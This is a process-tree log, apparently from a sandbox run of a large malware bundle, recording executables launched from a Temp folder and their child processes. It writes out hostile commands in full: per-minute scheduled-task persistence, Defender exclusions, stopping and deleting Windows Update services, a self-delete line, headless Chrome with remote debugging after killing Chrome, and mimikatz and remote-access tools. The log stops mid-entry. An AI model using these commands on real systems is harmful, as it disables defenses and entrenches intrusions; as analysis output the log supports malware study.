C:\Users\Admin\AppData\Local\Temp\a\2.exe
"C:\Users\Admin\AppData\Local\Temp\a\2.exe"
2⤵
PID:3812

C:\Users\Admin\AppData\Local\Temp\a\lega.exe
"C:\Users\Admin\AppData\Local\Temp\a\lega.exe"
2⤵
PID:7624

C:\Users\Admin\AppData\Local\Temp\IXP011.TMP\z4030383.exe
C:\Users\Admin\AppData\Local\Temp\IXP011.TMP\z4030383.exe
3⤵
PID:9504

C:\Users\Admin\AppData\Local\Temp\IXP012.TMP\o7603834.exe
C:\Users\Admin\AppData\Local\Temp\IXP012.TMP\o7603834.exe
4⤵
PID:9848

C:\Users\Admin\AppData\Local\Temp\IXP012.TMP\r7813734.exe
C:\Users\Admin\AppData\Local\Temp\IXP012.TMP\r7813734.exe
4⤵
PID:7388

C:\Users\Admin\AppData\Local\Temp\a\1.exe
"C:\Users\Admin\AppData\Local\Temp\a\1.exe"
2⤵
PID:9756

C:\Users\Admin\AppData\Local\Temp\a\ChromeFIX_error.exe
"C:\Users\Admin\AppData\Local\Temp\a\ChromeFIX_error.exe"
2⤵
PID:4180

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
3⤵
PID:8284

C:\Users\Admin\AppData\Local\Temp\a\oneetx.exe
"C:\Users\Admin\AppData\Local\Temp\a\oneetx.exe"
2⤵
PID:8340

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8340 -s 1004
3⤵
- Program crash
PID:7068

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8340 -s 1016
3⤵
- Program crash
PID:2844

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8340 -s 1012
3⤵
- Program crash
PID:10804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8340 -s 1028
3⤵
- Program crash
PID:10420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8340 -s 668
3⤵
- Program crash
PID:10332

C:\Windows\syswow64\rundll32.exe
"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
3⤵
PID:12344

C:\Users\Admin\AppData\Local\Temp\a\crypt.exe
"C:\Users\Admin\AppData\Local\Temp\a\crypt.exe"
2⤵
PID:9700

C:\Users\Admin\AppData\Local\Temp\qahnkzt.exe
"C:\Users\Admin\AppData\Local\Temp\qahnkzt.exe" C:\Users\Admin\AppData\Local\Temp\hxpsmql.q
3⤵
PID:6744

C:\Users\Admin\AppData\Local\Temp\qahnkzt.exe
"C:\Users\Admin\AppData\Local\Temp\qahnkzt.exe"
4⤵
PID:10148

C:\Users\Admin\AppData\Local\Temp\a\rrrr.exe
"C:\Users\Admin\AppData\Local\Temp\a\rrrr.exe"
2⤵
PID:5036

C:\Users\Admin\AppData\Local\Temp\lmlmm.exe
"C:\Users\Admin\AppData\Local\Temp\lmlmm.exe" C:\Users\Admin\AppData\Local\Temp\efxsftqx.tf
3⤵
PID:1500

C:\Users\Admin\AppData\Local\Temp\lmlmm.exe
"C:\Users\Admin\AppData\Local\Temp\lmlmm.exe"
4⤵
PID:10216

C:\Users\Admin\AppData\Local\Temp\lmlmm.exe
"C:\Users\Admin\AppData\Local\Temp\lmlmm.exe"
4⤵
PID:9672

C:\Users\Admin\AppData\Local\Temp\a\Group.exe
"C:\Users\Admin\AppData\Local\Temp\a\Group.exe"
2⤵
PID:9652

C:\Users\Admin\AppData\Local\Temp\a\activatezx.exe
"C:\Users\Admin\AppData\Local\Temp\a\activatezx.exe"
2⤵
PID:3880

C:\Users\Admin\AppData\Local\Temp\a\activatezx.exe
"C:\Users\Admin\AppData\Local\Temp\a\activatezx.exe"
3⤵
PID:11004

C:\Users\Admin\AppData\Local\Temp\a\telvm.exe
"C:\Users\Admin\AppData\Local\Temp\a\telvm.exe"
2⤵
PID:10184

C:\Users\Admin\AppData\Local\Temp\a\bellyzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\bellyzx.exe"
2⤵
PID:9848

C:\Users\Admin\AppData\Local\Temp\a\bkzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\bkzx.exe"
2⤵
PID:5320

C:\Users\Admin\AppData\Local\Temp\a\1bz7KfahvU.exe
"C:\Users\Admin\AppData\Local\Temp\a\1bz7KfahvU.exe"
2⤵
PID:6984

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "" "SCHTASKS.exe /Create /SC MINUTE /ED 12/12/2030 /TN runtime_1 /TR C:\Users\Admin\AppData\Roaming\Microsoft\config\runtime.exe"
3⤵
PID:3592

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /ED 12/12/2030 /TN runtime_1 /TR C:\Users\Admin\AppData\Roaming\Microsoft\config\runtime.exe
4⤵
- Creates scheduled task(s)
PID:10528

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "" "SCHTASKS.exe /Create /SC MINUTE /ED 12/12/2030 /TN runtime_2 /TR C:\Users\Admin\AppData\Local\Microsoft\config\runtime.exe"
3⤵
PID:7484

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /ED 12/12/2030 /TN runtime_2 /TR C:\Users\Admin\AppData\Local\Microsoft\config\runtime.exe
4⤵
- Creates scheduled task(s)
PID:9112

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "" "SCHTASKS.exe /Create /SC MINUTE /ED 12/12/2030 /TN runtime_3 /TR C:\Users\Admin\AppData\Local\Temp\Microsoft\config\runtime.exe"
3⤵
PID:10704

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /ED 12/12/2030 /TN runtime_3 /TR C:\Users\Admin\AppData\Local\Temp\Microsoft\config\runtime.exe
4⤵
- Creates scheduled task(s)
PID:8936

C:\Windows\system32\cmd.exe
cmd.exe /c "wmic csproduct get uuid"
3⤵
PID:9584

C:\Users\Admin\AppData\Local\Temp\a\SystemUpdate.exe
"C:\Users\Admin\AppData\Local\Temp\a\SystemUpdate.exe"
2⤵
PID:1500

C:\Users\Admin\AppData\Local\Temp\a\DefendUpdate.exe
"C:\Users\Admin\AppData\Local\Temp\a\DefendUpdate.exe"
2⤵
PID:1816

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\AppData\Local\Temp\a\DefendUpdate.exe
3⤵
PID:9304

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 0
4⤵
PID:9520

C:\Users\Admin\AppData\Local\Temp\a\ChromeFIX_errorMEM.exe
"C:\Users\Admin\AppData\Local\Temp\a\ChromeFIX_errorMEM.exe"
2⤵
PID:8764

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
3⤵
PID:11008

C:\Users\Admin\AppData\Local\Temp\a\vddsc.exe
"C:\Users\Admin\AppData\Local\Temp\a\vddsc.exe"
2⤵
PID:6764

C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe
"C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe"
3⤵
PID:4480

C:\Users\Admin\AppData\Local\Temp\a\GUI_MODERNISTA.exe
"C:\Users\Admin\AppData\Local\Temp\a\GUI_MODERNISTA.exe"
2⤵
PID:1304

C:\Users\Admin\AppData\Local\Temp\a\handdiy_6.exe
"C:\Users\Admin\AppData\Local\Temp\a\handdiy_6.exe"
2⤵
PID:10504

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
PID:5240

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
PID:10716

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
3⤵
PID:7260

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xd0,0xd4,0xd8,0xac,0xdc,0x7ffe24789758,0x7ffe24789768,0x7ffe24789778
4⤵
PID:10628

C:\Users\Admin\AppData\Local\Temp\a\handdiy_3.exe
"C:\Users\Admin\AppData\Local\Temp\a\handdiy_3.exe"
2⤵
PID:10892

C:\Users\Admin\AppData\Local\Temp\a\2221.exe
"C:\Users\Admin\AppData\Local\Temp\a\2221.exe"
2⤵
PID:10500

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=27585 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User DataRRWP6" --profile-directory="Default"
3⤵
PID:10428

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataRRWP6" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User DataRRWP6\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataRRWP6" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffe24789758,0x7ffe24789768,0x7ffe24789778
4⤵
PID:11020

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=1332 --field-trial-handle=1424,i,13283667118348301075,10356417888687730933,131072 --disable-features=PaintHolding /prefetch:2
4⤵
PID:5924

C:\Users\Admin\AppData\Local\Temp\a\philipzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\philipzx.exe"
2⤵
PID:10976

C:\Users\Admin\AppData\Local\Temp\a\philipzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\philipzx.exe"
3⤵
PID:524

C:\Users\Admin\AppData\Local\Temp\a\xme.exe
"C:\Users\Admin\AppData\Local\Temp\a\xme.exe"
2⤵
PID:6016

C:\Users\Admin\AppData\Local\Temp\a\xme.exe
"C:\Users\Admin\AppData\Local\Temp\a\xme.exe"
3⤵
PID:10720

C:\Users\Admin\AppData\Local\Temp\a\21.exe
"C:\Users\Admin\AppData\Local\Temp\a\21.exe"
2⤵
PID:4068

C:\Users\Admin\AppData\Local\Temp\a\11.exe
"C:\Users\Admin\AppData\Local\Temp\a\11.exe"
2⤵
PID:3504

C:\Users\Admin\AppData\Local\Temp\a\new_9_2022.exe
"C:\Users\Admin\AppData\Local\Temp\a\new_9_2022.exe"
2⤵
PID:2548

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cmd
3⤵
PID:10372

C:\Windows\system32\cmd.exe
cmd
4⤵
PID:9568

C:\Users\Admin\AppData\Local\Temp\a\w.exe
"C:\Users\Admin\AppData\Local\Temp\a\w.exe"
2⤵
PID:10384

C:\Users\Admin\AppData\Roaming\bitcoin-22.0-win64-setup.exe
"C:\Users\Admin\AppData\Roaming\bitcoin-22.0-win64-setup.exe" 0
3⤵
PID:8752

C:\Users\Admin\AppData\Roaming\electrum-4.3.4-setup.exe
"C:\Users\Admin\AppData\Roaming\electrum-4.3.4-setup.exe" 0
3⤵
PID:12044

C:\Users\Admin\AppData\Local\Temp\a\12.exe
"C:\Users\Admin\AppData\Local\Temp\a\12.exe"
2⤵
PID:3896

C:\Users\Admin\AppData\Local\Temp\a\dy.exe
"C:\Users\Admin\AppData\Local\Temp\a\dy.exe"
2⤵
PID:8068

C:\Users\Admin\AppData\Local\Temp\dyke bin.exe
"C:\Users\Admin\AppData\Local\Temp\dyke bin.exe"
3⤵
PID:4528

C:\Users\Admin\AppData\Local\Temp\a\ppp.exe
"C:\Users\Admin\AppData\Local\Temp\a\ppp.exe"
2⤵
PID:6776

C:\Users\Admin\AppData\Local\Temp\pee bin.exe
"C:\Users\Admin\AppData\Local\Temp\pee bin.exe"
3⤵
PID:8736

C:\Users\Admin\AppData\Local\Temp\a\dk.exe
"C:\Users\Admin\AppData\Local\Temp\a\dk.exe"
2⤵
PID:10272

C:\Users\Admin\AppData\Local\Temp\a\dk.exe
"C:\Users\Admin\AppData\Local\Temp\a\dk.exe"
3⤵
PID:10036

C:\Users\Admin\AppData\Local\Temp\a\wwa.exe
"C:\Users\Admin\AppData\Local\Temp\a\wwa.exe"
2⤵
PID:10444

C:\Users\Admin\AppData\Local\Temp\a\wwa.exe
"C:\Users\Admin\AppData\Local\Temp\a\wwa.exe"
3⤵
PID:9356

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9356 -s 572
4⤵
- Program crash
PID:10172

C:\Users\Admin\AppData\Local\Temp\a\secugopoundzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\secugopoundzx.exe"
2⤵
PID:8936

C:\Users\Admin\AppData\Local\Temp\a\secugopoundzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\secugopoundzx.exe"
3⤵
PID:10444

C:\Users\Admin\AppData\Local\Temp\a\2023.exe.exe
"C:\Users\Admin\AppData\Local\Temp\a\2023.exe.exe"
2⤵
PID:7076

C:\Users\Admin\AppData\Local\Temp\a\iron.exe
"C:\Users\Admin\AppData\Local\Temp\a\iron.exe"
2⤵
PID:10344

C:\Users\Admin\AppData\Local\Temp\is-A7VUS.tmp\iron.tmp
"C:\Users\Admin\AppData\Local\Temp\is-A7VUS.tmp\iron.tmp" /SL5="$50664,87342451,831488,C:\Users\Admin\AppData\Local\Temp\a\iron.exe"
3⤵
PID:9520

C:\Users\Admin\AppData\Local\Temp\a\13.exe
"C:\Users\Admin\AppData\Local\Temp\a\13.exe"
2⤵
PID:8692

C:\Users\Admin\AppData\Local\Temp\a\tv.exe
"C:\Users\Admin\AppData\Local\Temp\a\tv.exe"
2⤵
PID:11064

C:\Users\Admin\AppData\Local\Temp\TeamViewer\TeamViewer_.exe
"C:\Users\Admin\AppData\Local\Temp\TeamViewer\TeamViewer_.exe"
3⤵
PID:4564

C:\Users\Admin\AppData\Local\Temp\a\agent.exe
"C:\Users\Admin\AppData\Local\Temp\a\agent.exe"
2⤵
PID:6280

C:\Users\Admin\AppData\Local\Temp\a\mimikatz64.exe
"C:\Users\Admin\AppData\Local\Temp\a\mimikatz64.exe"
2⤵
PID:5312

C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe
"C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe"
2⤵
PID:10676

C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe
"C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe" --local-control
3⤵
PID:8604

C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe
"C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe" --local-service
3⤵
PID:11116

C:\Users\Admin\AppData\Local\Temp\a\nap.exe
"C:\Users\Admin\AppData\Local\Temp\a\nap.exe"
2⤵
PID:11128

C:\Users\Admin\AppData\Local\Temp\a\standrightzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\standrightzx.exe"
2⤵
PID:9868

C:\Users\Admin\AppData\Local\Temp\a\standrightzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\standrightzx.exe"
3⤵
PID:3452

C:\Users\Admin\AppData\Local\Temp\a\Clip1.exe
"C:\Users\Admin\AppData\Local\Temp\a\Clip1.exe"
2⤵
PID:3648

C:\Users\Admin\AppData\Local\Temp\a\VulnRecon.exe
"C:\Users\Admin\AppData\Local\Temp\a\VulnRecon.exe"
2⤵
PID:9080

C:\Users\Admin\AppData\Local\Temp\a\power.exe
"C:\Users\Admin\AppData\Local\Temp\a\power.exe"
2⤵
PID:10908

C:\Users\Admin\AppData\Local\Temp\ss31.exe
"C:\Users\Admin\AppData\Local\Temp\ss31.exe"
3⤵
PID:3000

C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
"C:\Users\Admin\AppData\Local\Temp\oldplayer.exe"
3⤵
PID:10508

C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
"C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe"
4⤵
PID:11836

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe" /F
5⤵
- Creates scheduled task(s)
PID:11848

C:\Users\Admin\AppData\Local\Temp\XandETC.exe
"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"
3⤵
PID:9468

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
4⤵
PID:11112

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
5⤵
PID:12672

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
5⤵
PID:8992

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
5⤵
PID:13164

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
5⤵
PID:9308

C:\Users\Admin\AppData\Local\Temp\a\handdiy_4.exe
"C:\Users\Admin\AppData\Local\Temp\a\handdiy_4.exe"
2⤵
PID:11084

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
PID:11720

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
PID:12060

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
3⤵
PID:11736

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffe24789758,0x7ffe24789768,0x7ffe24789778
4⤵
PID:4364

C:\Users\Admin\AppData\Local\Temp\a\cpm.exe
"C:\Users\Admin\AppData\Local\Temp\a\cpm.exe"
2⤵
PID:10740

C:\Users\Admin\AppData\Local\Temp\a\zxcvb.exe
"C:\Users\Admin\AppData\Local\Temp\a\zxcvb.exe"
2⤵
PID:10104

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMQAwAA==
3⤵
PID:12196

C:\Users\Admin\AppData\Local\Temp\Oufhkhuqzyjbligvmqold3.1npufiawunh.exe
"C:\Users\Admin\AppData\Local\Temp\Oufhkhuqzyjbligvmqold3.1npufiawunh.exe"
3⤵
PID:5884

C:\Users\Admin\AppData\Local\Temp\Oufhkhuqzyjbligvmqold3.1npufiawunh.exe
C:\Users\Admin\AppData\Local\Temp\Oufhkhuqzyjbligvmqold3.1npufiawunh.exe
4⤵
PID:3844

C:\Users\Admin\AppData\Local\Temp\a\zxcvb.exe
C:\Users\Admin\AppData\Local\Temp\a\zxcvb.exe
3⤵
PID:11216

C:\Users\Admin\AppData\Local\Temp\a\robinzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\robinzx.exe"
2⤵
PID:10084

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
3⤵
PID:8688

C:\Users\Admin\AppData\Local\Temp\a\bdr.exe
"C:\Users\Admin\AppData\Local\Temp\a\bdr.exe"
2⤵
PID:9732

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
3⤵
PID:10420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10420 -s 292
4⤵
- Program crash
PID:8084

C:\Users\Admin\AppData\Local\Temp\a\clifdthjsjkdgaoker.exe
"C:\Users\Admin\AppData\Local\Temp\a\clifdthjsjkdgaoker.exe"
2⤵
PID:11948

C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe
"C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe"
3⤵
PID:12096

C:\Users\Admin\AppData\Local\Temp\a\ChromeFIX_errorMEM1.exe
"C:\Users\Admin\AppData\Local\Temp\a\ChromeFIX_errorMEM1.exe"
2⤵
PID:12240

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
3⤵
PID:12176

C:\Users\Admin\AppData\Local\Temp\a\sesilezx.exe
"C:\Users\Admin\AppData\Local\Temp\a\sesilezx.exe"
2⤵
PID:6776

C:\Users\Admin\AppData\Local\Temp\a\powes.exe
"C:\Users\Admin\AppData\Local\Temp\a\powes.exe"
2⤵
PID:10568

C:\Users\Admin\AppData\Local\Temp\a\domainozx.exe
"C:\Users\Admin\AppData\Local\Temp\a\domainozx.exe"
2⤵
PID:11320

C:\Users\Admin\AppData\Local\Temp\a\domainozx.exe
"C:\Users\Admin\AppData\Local\Temp\a\domainozx.exe"
3⤵
PID:11432

C:\Users\Admin\AppData\Local\Temp\a\cbnzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\cbnzx.exe"
2⤵
PID:11624

C:\Users\Admin\AppData\Local\Temp\a\cbnzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\cbnzx.exe"
3⤵
PID:8996

C:\Users\Admin\AppData\Local\Temp\a\secagodzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\secagodzx.exe"
2⤵
PID:12016

C:\Users\Admin\AppData\Local\Temp\a\secagodzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\secagodzx.exe"
3⤵
PID:12528

C:\Users\Admin\AppData\Local\Temp\a\markzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\markzx.exe"
2⤵
PID:12048

C:\Users\Admin\AppData\Local\Temp\a\markzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\markzx.exe"
3⤵
PID:12988

C:\Users\Admin\AppData\Local\Temp\a\markzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\markzx.exe"
3⤵
PID:13168

C:\Users\Admin\AppData\Local\Temp\a\dialozx.exe
"C:\Users\Admin\AppData\Local\Temp\a\dialozx.exe"
2⤵
PID:10996

C:\Users\Admin\AppData\Local\Temp\a\dialozx.exe
"C:\Users\Admin\AppData\Local\Temp\a\dialozx.exe"
3⤵
PID:12892

C:\Users\Admin\AppData\Local\Temp\a\lunazx.exe
"C:\Users\Admin\AppData\Local\Temp\a\lunazx.exe"
2⤵
PID:10520

C:\Users\Admin\AppData\Local\Temp\a\lunazx.exe
"C:\Users\Admin\AppData\Local\Temp\a\lunazx.exe"
3⤵
PID:5236

C:\Users\Admin\AppData\Local\Temp\a\lunazx.exe
"C:\Users\Admin\AppData\Local\Temp\a\lunazx.exe"
3⤵
PID:11800

C:\Users\Admin\AppData\Local\Temp\a\stlr.exe
"C:\Users\Admin\AppData\Local\Temp\a\stlr.exe"
2⤵
PID:4416

C:\Users\Admin\AppData\Local\Temp\a\newtpp.exe
"C:\Users\Admin\AppData\Local\Temp\a\newtpp.exe"
2⤵
PID:11912

C:\Windows\sysqxrdsvc.exe
C:\Windows\sysqxrdsvc.exe
3⤵
PID:12240

C:\Users\Admin\AppData\Local\Temp\228286278.exe
C:\Users\Admin\AppData\Local\Temp\228286278.exe
4⤵
PID:12216

C:\Users\Admin\AppData\Local\Temp\2091716921.exe
C:\Users\Admin\AppData\Local\Temp\2091716921.exe
4⤵
PID:12724

C:\Users\Admin\AppData\Local\Temp\292521901.exe
C:\Users\Admin\AppData\Local\Temp\292521901.exe
4⤵
PID:12184

C:\Users\Admin\sysqxrdsvc.exe
C:\Users\Admin\sysqxrdsvc.exe
5⤵
PID:14076

C:\Users\Admin\AppData\Local\Temp\2584016167.exe
C:\Users\Admin\AppData\Local\Temp\2584016167.exe
6⤵
PID:10752

C:\Users\Admin\AppData\Local\Temp\1854611228.exe
C:\Users\Admin\AppData\Local\Temp\1854611228.exe
6⤵
PID:9768

C:\Users\Admin\AppData\Local\Temp\a\CHEAT-MENU-LINK-1.exe
"C:\Users\Admin\AppData\Local\Temp\a\CHEAT-MENU-LINK-1.exe"
2⤵
PID:3284

C:\Users\Admin\AppData\Local\Temp\a\serv.exe
"C:\Users\Admin\AppData\Local\Temp\a\serv.exe"
2⤵
PID:11572

C:\Users\Admin\AppData\Local\Temp\a\serv1.exe
"C:\Users\Admin\AppData\Local\Temp\a\serv1.exe"
2⤵
PID:3844

C:\Users\Admin\AppData\Local\Temp\a\Aztec.exe
"C:\Users\Admin\AppData\Local\Temp\a\Aztec.exe"
2⤵
PID:5140

C:\Users\Admin\AppData\Local\Temp\a\faintxakers.exe
"C:\Users\Admin\AppData\Local\Temp\a\faintxakers.exe"
2⤵
PID:2156

C:\Users\Admin\AppData\Local\Temp\a\payload.exe
"C:\Users\Admin\AppData\Local\Temp\a\payload.exe"
2⤵
PID:9264

C:\Users\Admin\AppData\Local\Temp\runtime-bind.exe
"C:\Users\Admin\AppData\Local\Temp\runtime-bind.exe"
3⤵
PID:9168

C:\Users\Admin\AppData\Local\Temp\visual-c++.exe
"C:\Users\Admin\AppData\Local\Temp\visual-c++.exe"
3⤵
PID:6952

C:\Users\Admin\AppData\Local\Temp\a\1221.exe
"C:\Users\Admin\AppData\Local\Temp\a\1221.exe"
2⤵
PID:11164

C:\Users\Admin\AppData\Local\Temp\a\chimezx.exe
"C:\Users\Admin\AppData\Local\Temp\a\chimezx.exe"
2⤵
PID:9564

C:\Users\Admin\AppData\Local\Temp\a\chimezx.exe
"C:\Users\Admin\AppData\Local\Temp\a\chimezx.exe"
3⤵
PID:11656

C:\Users\Admin\AppData\Local\Temp\a\chimezx.exe
"C:\Users\Admin\AppData\Local\Temp\a\chimezx.exe"
3⤵
PID:8992

C:\Users\Admin\AppData\Local\Temp\a\chimezx.exe
"C:\Users\Admin\AppData\Local\Temp\a\chimezx.exe"
3⤵
PID:12648

C:\Users\Admin\AppData\Local\Temp\a\Brav.exe
"C:\Users\Admin\AppData\Local\Temp\a\Brav.exe"
2⤵
PID:10016

C:\Users\Admin\AppData\Local\Temp\a\LEMMIN.exe
"C:\Users\Admin\AppData\Local\Temp\a\LEMMIN.exe"
2⤵
PID:11444

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
3⤵
PID:12512

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:13260

C:\Windows\System32\sc.exe
sc stop UsoSvc
4⤵
- Launches sc.exe
PID:13144

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
4⤵
- Launches sc.exe
PID:13724

C:\Windows\System32\sc.exe
sc stop wuauserv
4⤵
- Launches sc.exe
PID:13708

C:\Windows\System32\sc.exe
sc stop bits
4⤵
- Launches sc.exe
PID:10532

C:\Windows\System32\sc.exe
sc stop dosvc
4⤵
- Launches sc.exe
PID:13560

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
4⤵
PID:12236

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
4⤵
PID:7748

C:\Windows\System32\reg.exe
